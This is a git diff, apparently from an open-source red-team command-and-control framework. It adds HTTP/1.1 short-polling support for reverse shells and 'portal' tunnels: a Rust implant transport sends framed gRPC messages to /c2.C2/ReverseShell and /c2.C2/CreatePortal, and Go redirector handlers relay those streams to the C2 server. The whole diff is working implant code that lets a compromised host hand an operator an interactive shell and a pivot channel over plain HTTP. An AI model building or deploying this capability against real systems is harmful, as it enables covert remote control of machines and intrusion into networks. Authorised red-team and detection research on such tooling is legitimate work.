diff --git a/implants/lib/transport/src/http.rs b/implants/lib/transport/src/http.rs index 062bdadaa..cb7912684 100644 --- a/implants/lib/transport/src/http.rs +++ b/implants/lib/transport/src/http.rs @@ -89,7 +89,8 @@ static REPORT_CREDENTIAL_PATH: &str = "/c2.C2/ReportCredential"; static REPORT_FILE_PATH: &str = "/c2.C2/ReportFile"; static REPORT_PROCESS_LIST_PATH: &str = "/c2.C2/ReportProcessList"; static REPORT_OUTPUT_PATH: &str = "/c2.C2/ReportOutput"; -static _REVERSE_SHELL_PATH: &str = "/c2.C2/ReverseShell"; +static REVERSE_SHELL_PATH: &str = "/c2.C2/ReverseShell"; +static CREATE_PORTAL_PATH: &str = "/c2.C2/CreatePortal"; // Marshal: Encode and encrypt a message using the ChachaCodec // Uses the helper functions exported from pb::xchacha @@ -166,6 +167,92 @@ impl std::fmt::Debug for HTTP { } impl HTTP { + async fn handle_short_poll_streaming( + &self, + mut rx: tokio::sync::mpsc::Receiver, + tx: tokio::sync::mpsc::Sender, + path: &'static str, + ) -> Result<()> + where + Req: Message + Send + 'static, + Resp: Message + Default + Send + 'static, + { + loop { + // Buffer to hold messages to send in this polling interval + let mut messages = Vec::new(); + + // Check if there's any outgoing message (blocks until one is available or channel closed) + match tokio::time::timeout(std::time::Duration::from_millis(50), rx.recv()).await { + Ok(Some(msg)) => { + messages.push(msg); + + // Grab any other immediately available messages + while let Ok(msg) = rx.try_recv() { + messages.push(msg); + } + } + Ok(None) => { + // Channel closed, terminate streaming + break; + } + Err(_) => { + // Timeout (50ms elapsed, no message). Continue loop to send empty payload/ping + } + } + + // Prepare the body with encoded gRPC frames + let mut request_body = BytesMut::new(); + for msg in messages { + let request_bytes = match marshal_with_codec::(msg) { + Ok(bytes) => bytes, + Err(err) => { + #[cfg(debug_assertions)] + log::error!("Failed to marshal streaming message: {}", err); + continue; + } + }; + let frame_header = grpc_frame::FrameHeader::new(request_bytes.len() as u32); + request_body.extend_from_slice(&frame_header.encode()); + request_body.extend_from_slice(&request_bytes); + } + + // Build and send the HTTP request + let uri = self.build_uri(path)?; + let req = self + .request_builder(uri) + .body(hyper_legacy::Body::from(request_body.freeze())) + .context("Failed to build HTTP request")?; + + let response = match self.send_and_validate(req).await { + Ok(resp) => resp, + Err(err) => { + #[cfg(debug_assertions)] + log::error!("Failed to send short poll HTTP request: {}", err); + tokio::time::sleep(std::time::Duration::from_secs(1)).await; + continue; + } + }; + + // Stream and process response frames + let result = Self::stream_grpc_frames::(response, |response_msg| { + tx.blocking_send(response_msg).map_err(|err| { + anyhow::anyhow!("Failed to send response through channel: {}", err) + }) + }) + .await; + + if let Err(err) = result { + #[cfg(debug_assertions)] + log::error!("Failed to process response frames: {}", err); + } + + // Adding a small delay to prevent tight loop spinning if rx channel isn't busy + tokio::time::sleep(std::time::Duration::from_millis(500)).await; + } + + Ok(()) + } + /// Build URI from path fn build_uri(&self, path: &str) -> Result { let url = format!("{}{}", self.base_url, path); @@ -537,22 +624,20 @@ impl Transport for HTTP { async fn reverse_shell( &mut self, - _rx: tokio::sync::mpsc::Receiver, - _tx: tokio::sync::mpsc::Sender, + rx: tokio::sync::mpsc::Receiver, + tx: tokio::sync::mpsc::Sender, ) -> Result<()> { - Err(anyhow::anyhow!( - "http/1.1 transport does not support reverse shell" - )) + self.handle_short_poll_streaming(rx, tx, REVERSE_SHELL_PATH) + .await } async fn create_portal( &mut self, - _rx: tokio::sync::mpsc::Receiver, - _tx: tokio::sync::mpsc::Sender, + rx: tokio::sync::mpsc::Receiver, + tx: tokio::sync::mpsc::Sender, ) -> Result<()> { - Err(anyhow::anyhow!( - "http/1.1 transport does not support portal" - )) + self.handle_short_poll_streaming(rx, tx, CREATE_PORTAL_PATH) + .await } fn get_type(&mut self) -> pb::c2::transport::Type { diff --git a/tavern/internal/redirectors/http1/grpc_stream.go b/tavern/internal/redirectors/http1/grpc_stream.go index 0aaf2f8b4..09069337a 100644 --- a/tavern/internal/redirectors/http1/grpc_stream.go +++ b/tavern/internal/redirectors/http1/grpc_stream.go @@ -31,6 +31,24 @@ var ( }, MethodPath: "/c2.C2/ReportFile", } + + reverseShellStream = streamConfig{ + Desc: grpc.StreamDesc{ + StreamName: "ReverseShell", + ServerStreams: true, + ClientStreams: true, + }, + MethodPath: "/c2.C2/ReverseShell", + } + + createPortalStream = streamConfig{ + Desc: grpc.StreamDesc{ + StreamName: "CreatePortal", + ServerStreams: true, + ClientStreams: true, + }, + MethodPath: "/c2.C2/CreatePortal", + } ) // createStream creates a gRPC stream with the given configuration diff --git a/tavern/internal/redirectors/http1/handlers.go b/tavern/internal/redirectors/http1/handlers.go index 61477e130..496bcccbf 100644 --- a/tavern/internal/redirectors/http1/handlers.go +++ b/tavern/internal/redirectors/http1/handlers.go @@ -94,6 +94,92 @@ func handleFetchAssetStreaming(w http.ResponseWriter, r *http.Request, conn *grp slog.Debug("http1 redirector: FetchAsset streaming complete", "chunks", chunkCount, "total_bytes", totalBytes) } +func handleShortPollStreaming(w http.ResponseWriter, r *http.Request, conn *grpc.ClientConn, cfg streamConfig) { + if !requirePOST(w, r) { + slog.Error("http1 redirector: incoming request rejected, method not allowed", "method", r.Method, "path", r.URL.Path, "source", r.RemoteAddr) + return + } + + clientIP := getClientIP(r) + slog.Info("http1 redirector: request", "source", clientIP, "destination", cfg.MethodPath) + slog.Debug("http1 redirector: short poll streaming request", "method", cfg.MethodPath, "source", clientIP) + + ctx, cancel := createRequestContext(unaryTimeout) + defer cancel() + + // Parse incoming gRPC stream data + buffer, ok := readRequestBody(w, r) + if !ok { + slog.Error("http1 redirector: incoming request failed, could not read request body", "path", cfg.MethodPath, "source", clientIP) + return + } + + stream, err := createStream(ctx, conn, cfg) + if err != nil { + slog.Error("http1 redirector: upstream request failed, could not create gRPC stream", "method", cfg.MethodPath, "error", err) + handleStreamError(w, "Failed to create gRPC stream", err) + return + } + + // Send all messages extracted from buffer + for { + header, message, remaining, ok := extractFrame(buffer) + if !ok { + break + } + + buffer = remaining + slog.Debug("http1 redirector: received short poll stream chunk", "compression", header.CompressionFlag, "length", header.MessageLength) + + if err := stream.SendMsg(message); err != nil { + slog.Error("http1 redirector: upstream request failed, could not send gRPC message", "method", cfg.MethodPath, "error", err) + handleStreamError(w, "Failed to send gRPC message", err) + return + } + } + + if err := stream.CloseSend(); err != nil { + slog.Error("http1 redirector: upstream request failed, could not close gRPC send", "method", cfg.MethodPath, "error", err) + handleStreamError(w, "Failed to close gRPC send", err) + return + } + + setGRPCResponseHeaders(w) + + // Collect any returned messages and pack them as a single response buffer + chunkCount := 0 + totalBytes := 0 + for { + var responseChunk []byte + err := stream.RecvMsg(&responseChunk) + if err == io.EOF { + break + } + if err != nil { + slog.Error("http1 redirector: upstream request failed, error receiving stream message", "method", cfg.MethodPath, "error", err) + return + } + + chunkCount++ + totalBytes += len(responseChunk) + slog.Debug("http1 redirector: received stream chunk", "chunk", chunkCount, "chunk_size", len(responseChunk)) + + // Write gRPC frame header + frameHeader := newFrameHeader(uint32(len(responseChunk))) + encodedHeader := frameHeader.Encode() + if _, err := w.Write(encodedHeader[:]); err != nil { + slog.Error("http1 redirector: incoming request failed, could not write frame header to client", "error", err) + return + } + + if _, err := w.Write(responseChunk); err != nil { + slog.Error("http1 redirector: incoming request failed, could not write chunk to client", "error", err) + return + } + } + slog.Debug("http1 redirector: short poll streaming complete", "chunks", chunkCount, "total_bytes", totalBytes) +} + func handleReportFileStreaming(w http.ResponseWriter, r *http.Request, conn *grpc.ClientConn) { if !requirePOST(w, r) { slog.Error("http1 redirector: incoming request rejected, method not allowed", "method", r.Method, "path", r.URL.Path, "source", r.RemoteAddr) diff --git a/tavern/internal/redirectors/http1/redirector.go b/tavern/internal/redirectors/http1/redirector.go index 1d78e2740..19a79cce9 100644 --- a/tavern/internal/redirectors/http1/redirector.go +++ b/tavern/internal/redirectors/http1/redirector.go @@ -27,6 +27,12 @@ func (r *Redirector) Redirect(ctx context.Context, listenOn string, upstream *gr mux.HandleFunc("/c2.C2/ReportFile", func(w http.ResponseWriter, r *http.Request) { handleReportFileStreaming(w, r, upstream) }) + mux.HandleFunc("/c2.C2/ReverseShell", func(w http.ResponseWriter, r *http.Request) { + handleShortPollStreaming(w, r, upstream, reverseShellStream) + }) + mux.HandleFunc("/c2.C2/CreatePortal", func(w http.ResponseWriter, r *http.Request) { + handleShortPollStreaming(w, r, upstream, createPortalStream) + }) mux.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) { handleHTTPRequest(w, r, upstream) })